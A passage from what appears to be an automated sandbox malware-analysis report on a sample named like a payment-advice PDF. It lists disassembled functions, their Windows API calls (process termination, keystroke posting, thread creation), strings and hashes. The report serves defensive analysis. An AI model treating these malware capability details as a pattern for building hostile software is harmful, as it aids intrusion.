                                                              • Instruction Fuzzy Hash: 7EE17D316042509FD724EF28C881AAABBE1FF85314F14896DF999DB3A2DB31DC45CB52
                                                              Function 008A4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 008A466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008A3697,?), ref: 008A468B
                                                                • Part of subcall function 008A466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008A3697,?), ref: 008A46A4
                                                                • Part of subcall function 008A4A31: GetFileAttributesW.KERNEL32(?,008A370B), ref: 008A4A32
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 008A4D40
                                                              • _wcscmp.LIBCMT ref: 008A4D5A
                                                              • MoveFileW.KERNEL32(?,?), ref: 008A4D75
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                              • String ID:
                                                              • API String ID: 793581249-0
                                                              • Opcode ID: de645e977e6dc2d9f009877f0069b43a143e8c500a11ae3a79ad3eb074b19df1
                                                              • Instruction ID: 1c18e639db805e478952a47bf313fb61eef00222aa575d6060a761e8f22fa46f
                                                              • Opcode Fuzzy Hash: de645e977e6dc2d9f009877f0069b43a143e8c500a11ae3a79ad3eb074b19df1
                                                              • Instruction Fuzzy Hash: D15151B24083459BDB24DB64D8819DFB7ECFF85310F00192EB689D3552EF74A588C766
                                                              Function 008C8645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 008C86FF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: 9cc11070ab96ad0117242ecab9f81884242b7b35d93909ef2f6237dc1cca49a9
                                                              • Instruction ID: a9ea4d6cd8c33c6bfb5d5b6624528dcf900c7876c6617adb4a7dc086028808ab
                                                              • Opcode Fuzzy Hash: 9cc11070ab96ad0117242ecab9f81884242b7b35d93909ef2f6237dc1cca49a9
                                                              • Instruction Fuzzy Hash: 3151A330580258FEEF209B28DC89FAD7BB5FB15314F604129FA11E66A1DF71E980DB51
                                                              Function 00842B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0087C2F7
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0087C319
                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0087C331
                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0087C34F
                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0087C370
                                                              • DestroyIcon.USER32(00000000), ref: 0087C37F
                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0087C39C
                                                              • DestroyIcon.USER32(?), ref: 0087C3AB
                                                                • Part of subcall function 008CA4AF: DeleteObject.GDI32(00000000), ref: 008CA4E8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                              • String ID:
                                                              • API String ID: 2819616528-0
                                                              • Opcode ID: 5797779ec2306730f749f9de2688d0ce0ba533db8e19194db6f0a828809566a4
                                                              • Instruction ID: 20966d4a7e7c65cf061b367be99cb972d0befea925456cec308536d043e036a5
                                                              • Opcode Fuzzy Hash: 5797779ec2306730f749f9de2688d0ce0ba533db8e19194db6f0a828809566a4
                                                              • Instruction Fuzzy Hash: 12513670614209EFDB24DF64CC45FAA7BB9FB58324F508528F946D72A0D7B0E990DB50
                                                              Function 0089966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0089A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0089A84C
                                                                • Part of subcall function 0089A82C: GetCurrentThreadId.KERNEL32 ref: 0089A853
                                                                • Part of subcall function 0089A82C: AttachThreadInput.USER32(00000000,?,00899683,?,00000001), ref: 0089A85A
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 0089968E
                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008996AB
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 008996AE
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 008996B7
                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 008996D5
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008996D8
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 008996E1
                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008996F8
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008996FB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                              • String ID:
                                                              • API String ID: 2014098862-0
                                                              • Opcode ID: dd1e3b292fa450f2413d34591e8c3e07274dae8713f9fb9d7652bd471f61525f
                                                              • Instruction ID: 0e40e24b5e3c7027aab549fe7afa47e5e01588261212bb94fe267ae73453b672
                                                              • Opcode Fuzzy Hash: dd1e3b292fa450f2413d34591e8c3e07274dae8713f9fb9d7652bd471f61525f
                                                              • Instruction Fuzzy Hash: 1E11E571910218BEFA116F64DC49F6A3F2EFB5C795F110426F744AB0A1C9F35C10DAA4
                                                              Function 00898921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0089853C,00000B00,?,?), ref: 0089892A
                                                              • HeapAlloc.KERNEL32(00000000,?,0089853C,00000B00,?,?), ref: 00898931
                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0089853C,00000B00,?,?), ref: 00898946
                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,0089853C,00000B00,?,?), ref: 0089894E
                                                              • DuplicateHandle.KERNEL32(00000000,?,0089853C,00000B00,?,?), ref: 00898951
                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0089853C,00000B00,?,?), ref: 00898961
                                                              • GetCurrentProcess.KERNEL32(0089853C,00000000,?,0089853C,00000B00,?,?), ref: 00898969
                                                              • DuplicateHandle.KERNEL32(00000000,?,0089853C,00000B00,?,?), ref: 0089896C
                                                              • CreateThread.KERNEL32(00000000,00000000,00898992,00000000,00000000,00000000), ref: 00898986
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                              • String ID:
                                                              • API String ID: 1957940570-0
                                                              • Opcode ID: 4651f599454f3484359c6f5f1af50357eff9162500a08b2246b9174e67671820
                                                              • Instruction ID: 2b3469d8438bdbd8081ab8c74e3ea200647de3a40a910840938e98bb44cdbe99
                                                              • Opcode Fuzzy Hash: 4651f599454f3484359c6f5f1af50357eff9162500a08b2246b9174e67671820
                                                              • Instruction Fuzzy Hash: B501ACB5240304FFE611ABA5DC49F677B6DFB89711F444421FB05DB191CA7598008A20
                                                              Function 008B9B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                              • API String ID: 0-572801152
                                                              • Opcode ID: 2a4901752d22e8f98c2ca19babcdf259ae0d00648aa997cfd150187e0e638d63
                                                              • Instruction ID: 3153096313df38f0d041329619cde2008508115c12d6927567dbe4e7f7ca343d
                                                              • Opcode Fuzzy Hash: 2a4901752d22e8f98c2ca19babcdf259ae0d00648aa997cfd150187e0e638d63
                                                              • Instruction Fuzzy Hash: BCC17171A0021A9BDF10DFA8D884AEEB7F5FB48314F158469EA45EB381E770ED45CB90
                                                              Function 008B9113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$_memset
                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                              • API String ID: 2862541840-625585964
                                                              • Opcode ID: d035610baa5c7feed8b885ef28c76e2cd7ee4631daccd5ebf8ba9dd26a49a59b
                                                              • Instruction ID: 6ca47e994bcddebd6b3adf7aa324805f18ad116911f18f0cfd867ec649ef65a1
                                                              • Opcode Fuzzy Hash: d035610baa5c7feed8b885ef28c76e2cd7ee4631daccd5ebf8ba9dd26a49a59b
                                                              • Instruction Fuzzy Hash: 09915971A00219ABDF24CFA5C888FEEBBB8FF49714F108159E655EB381D7709945CBA0
                                                              Function 008B975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0089710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00897044,80070057,?,?,?,00897455), ref: 00897127
                                                                • Part of subcall function 0089710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00897044,80070057,?,?), ref: 00897142
                                                                • Part of subcall function 0089710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00897044,80070057,?,?), ref: 00897150
                                                                • Part of subcall function 0089710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00897044,80070057,?), ref: 00897160
                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 008B9806
                                                              • _memset.LIBCMT ref: 008B9813
                                                              • _memset.LIBCMT ref: 008B9956
                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 008B9982
                                                              • CoTaskMemFree.OLE32(?), ref: 008B998D
                                                              Strings
                                                              • NULL Pointer assignment, xrefs: 008B99DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                              • String ID: NULL Pointer assignment
                                                              • API String ID: 1300414916-2785691316
                                                              • Opcode ID: 9851640814788d65e1e1a274a9c9fb9d56787319a00fdd075a057c8e5c646016
                                                              • Instruction ID: dcd3a106b517723fe17d77c5fd0e709823e32c5819b2d3c068bcd3ac1cc63e94
                                                              • Opcode Fuzzy Hash: 9851640814788d65e1e1a274a9c9fb9d56787319a00fdd075a057c8e5c646016
                                                              • Instruction Fuzzy Hash: CC91147190022DEBDB10DFA5DC41EDEBBB9FF08710F20416AE519E7291EB719A44CBA1
                                                              Function 008C6D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 008C6E24
                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 008C6E38
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 008C6E52
                                                              • _wcscat.LIBCMT ref: 008C6EAD
                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 008C6EC4
                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 008C6EF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window_wcscat
                                                              • String ID: SysListView32
                                                              • API String ID: 307300125-78025650
                                                              • Opcode ID: f78f234f961dd3fd8b392f9b8710553b3398346fc7d4ee4b228adfa98fb1e0d2
                                                              • Instruction ID: 56057b7e37b5e278afb15fae289217ac1e930aec943c30d389c31eacd8613898
                                                              • Opcode Fuzzy Hash: f78f234f961dd3fd8b392f9b8710553b3398346fc7d4ee4b228adfa98fb1e0d2
                                                              • Instruction Fuzzy Hash: A3418271A00348ABEB219F64CC85FEA77B9FF08354F10446EF685D7291D672DD948B60
                                                              Function 008BE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 008A3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 008A3C7A
                                                                • Part of subcall function 008A3C55: Process32FirstW.KERNEL32(00000000,?), ref: 008A3C88
                                                                • Part of subcall function 008A3C55: CloseHandle.KERNEL32(00000000), ref: 008A3D52
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008BE9A4
                                                              • GetLastError.KERNEL32 ref: 008BE9B7
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008BE9E6
                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 008BEA63
                                                              • GetLastError.KERNEL32(00000000), ref: 008BEA6E
                                                              • CloseHandle.KERNEL32(00000000), ref: 008BEAA3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                              • String ID: SeDebugPrivilege
                                                              • API String ID: 2533919879-2896544425
                                                              • Opcode ID: eb2b91d4de1e24e53fc380e358e1aeb233bd36fa4c25c1c8c3dddede714fe8f9
                                                              • Instruction ID: 5fff90bc31ca9aae18072ebe872ac223ba3890507375f98f98e4e62cebb4ed82
                                                              • Opcode Fuzzy Hash: eb2b91d4de1e24e53fc380e358e1aeb233bd36fa4c25c1c8c3dddede714fe8f9
                                                              • Instruction Fuzzy Hash: B8418A312002059FDB21EF28CC95FAEBBA5FF50314F088419FA429B3D2DB75A804CB96
                                                              Function 008A2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadIconW.USER32(00000000,00007F03), ref: 008A3033
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: IconLoad
                                                              • String ID: blank$info$question$stop$warning
                                                              • API String ID: 2457776203-404129466
                                                              • Opcode ID: 4c049e5a783180c8a07b4a71d8e50b5b05b3b01d1454636a830365fac30e2825
                                                              • Instruction ID: 4e471a22b58045f4a5e95fbf221f0d65924952d64483f25733df0f8d11216be7
                                                              • Opcode Fuzzy Hash: 4c049e5a783180c8a07b4a71d8e50b5b05b3b01d1454636a830365fac30e2825
                                                              • Instruction Fuzzy Hash: 14112B35348B8ABFF7149B18DC42C6B779CFF1A324B20006AFA10E6682EB755F4055A5
                                                              Function 008A42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 008A4312
                                                              • LoadStringW.USER32(00000000), ref: 008A4319
                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 008A432F
                                                              • LoadStringW.USER32(00000000), ref: 008A4336
                                                              • _wprintf.LIBCMT ref: 008A435C
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008A437A
                                                              Strings
                                                              • %s (%d) : ==> %s: %s %s, xrefs: 008A4357
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                              • API String ID: 3648134473-3128320259
                                                              • Opcode ID: df2de7a32fb8cedee2387ef81076c79a849eb71594ca49a4d49b615884a599d8
                                                              • Instruction ID: a4513ccce6de4cd602a2130f732450aec645aec1a31856a7d9cd42e72a221560
                                                              • Opcode Fuzzy Hash: df2de7a32fb8cedee2387ef81076c79a849eb71594ca49a4d49b615884a599d8
                                                              • Instruction Fuzzy Hash: 2A014FF2900208BFFB1197A4DD89EE6777CFB08301F0005A6B745E2152EA749E854B75
                                                              Function 008CD43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00842612: GetWindowLongW.USER32(?,000000EB), ref: 00842623
                                                              • GetSystemMetrics.USER32(0000000F), ref: 008CD47C
                                                              • GetSystemMetrics.USER32(0000000F), ref: 008CD49C
                                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 008CD6D7
                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 008CD6F5
                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 008CD716
                                                              • ShowWindow.USER32(00000003,00000000), ref: 008CD735
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 008CD75A
                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 008CD77D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                              • String ID:
                                                              • API String ID: 1211466189-0
                                                              • Opcode ID: a927ca408d08c3f07ec28bdc61d54a6ec9d12d1a16b5761f6926041ea4b85b01
                                                              • Instruction ID: 79ca426b1c7baaf4229cb9e5024dea2a36363b618b30a05c943ce73cf0d64324
                                                              • Opcode Fuzzy Hash: a927ca408d08c3f07ec28bdc61d54a6ec9d12d1a16b5761f6926041ea4b85b01
                                                              • Instruction Fuzzy Hash: 92B16871600229AFDF14DF68C985BAA7BB1FF48711F09C079ED48DA295D734E950CB90
                                                              Function 00842A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0087C1C7,00000004,00000000,00000000,00000000), ref: 00842ACF
                                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0087C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00842B17
                                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0087C1C7,00000004,00000000,00000000,00000000), ref: 0087C21A
                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0087C1C7,00000004,00000000,00000000,00000000), ref: 0087C286
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow
                                                              • String ID:
